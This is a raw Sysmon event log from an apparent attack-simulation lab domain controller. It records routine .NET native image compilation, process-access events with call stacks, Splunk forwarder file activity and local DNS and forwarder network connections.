AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KP9338WXGM\System.Web.RegularExpressions.ni.dll.auxMD5=018717FFF06A4E8F477A0E99864F8CE0,SHA256=31BB6187BA2D5EABFDED51F2D3DE7801B7D7E39890232384856DB39C9C578BBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.670{4DB9351A-A289-60D3-FB05-00000000CF01}2932NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KP9338WXGM\System.Web.RegularExpressions.ni.dllMD5=4E936BFA5621B1AF5D44A202DDA7F8BD,SHA256=632645D27980B291628D85D6E7E24B837DCE111602D7BEA0F12EA4C9E1F9C81D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-FB05-00000000CF01}2932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-FB05-00000000CF01}2932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-FB05-00000000CF01}2932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-A289-60D3-FA05-00000000CF01}6532NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\INH6O9CPDB\System.Web.Mobile.ni.dll.auxMD5=FE21FC921736AB97D2CE58ED17543ED0,SHA256=09603FD2CB964909BE4D93EC28E7EC02F217C0AAB835AA3B285136E8A505A155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-A289-60D3-FA05-00000000CF01}6532NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\INH6O9CPDB\System.Web.Mobile.ni.dllMD5=06B0D3889FAB4AFFF9CCBBEC4AEDBD55,SHA256=220DC68D0EB961A5F94860BCBA485077180F5115A78DABAA1330D13406EB0468,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.467{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-FA05-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-FA05-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-FA05-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-A289-60D3-F905-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DC8GKAP8KO\System.Web.Extensions.Design.ni.dll.auxMD5=2E190ABF6C926075E6BFFD9737B3FA5E,SHA256=58FFA5D88639A41F48019DB56458BC073ACF929B34342A8179BAF22819480E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-A289-60D3-F905-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DC8GKAP8KO\System.Web.Extensions.Design.ni.dllMD5=E962BF0BFF0D652F79278764B5EC481A,SHA256=DED0AC4AC3D379F75F3B2751F6A7AF4A1045D6187957EE09371C990ECD1750E0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.420{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F905-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F905-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F905-00000000CF01}2796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-A289-60D3-F805-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2IPE8MAUMM\System.Web.Extensions.ni.dll.auxMD5=C2619B2FE4599E5587D901C82A35C2B2,SHA256=4BEF9FB8C1F170E60C4CE34BFED2A00483BF90A3362DC60611F72B2B52739186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-A289-60D3-F805-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2IPE8MAUMM\System.Web.Extensions.ni.dllMD5=AE8181AB955D15A62AB5ED3846B563CB,SHA256=6E835676CDBDBD3F45662D034D244F536CD627572BA58CDFF8BC722D6E8FD69D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.405{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6507020CB26C44DDEEF769BB292645E,SHA256=3A8C51864B2DF6C936E15F17CD1FD47B0152ACAB9DE688AC70233E75DF52302F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000023873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.209{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local54244- 354300x800000000000000023872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.240{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61468-false10.0.1.12-8000- 10341000x800000000000000023871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.201{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F805-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.186{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F805-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.186{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F805-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.170{4DB9351A-A289-60D3-F705-00000000CF01}1088NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNY2FWI5J3\System.Web.Entity.Design.ni.dll.auxMD5=3D65530D174188B5BB64FBF6CB6691E0,SHA256=36817B6937032381FE20947D816B38B057437AA88C3EEC95A8AEED71F397B1A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.170{4DB9351A-A289-60D3-F705-00000000CF01}1088NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNY2FWI5J3\System.Web.Entity.Design.ni.dllMD5=DC268F5ACB57C7F29E42A1F763EFEB04,SHA256=A774DDE38E01867EA3DFB23C3364A57E4FA4AE85CF4E074682389AF3FC04CD43,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F705-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.155{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=273222D6152193319C5BA78028A8B1E3,SHA256=42C9CC4B07C73D2842CD6FE4B2E70C9FAE1D447234913233162245E933AACDE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F705-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F705-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-A289-60D3-F605-00000000CF01}3716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CDMG90PHKY\System.Web.Entity.ni.dll.auxMD5=4CA4069206709CF9E86979C4688106C7,SHA256=E727FB37D9FA9FCEB637A5C38EF68F87842952CD0F8390D4C8E0724B9099BE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.139{4DB9351A-A289-60D3-F605-00000000CF01}3716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CDMG90PHKY\System.Web.Entity.ni.dllMD5=4A26706D629E724852EE71A44118D4A6,SHA256=C2A22A324092F58B22ACC6EECCF26446173354E7B8C5B19485F908408540861C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F605-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.092{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F605-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 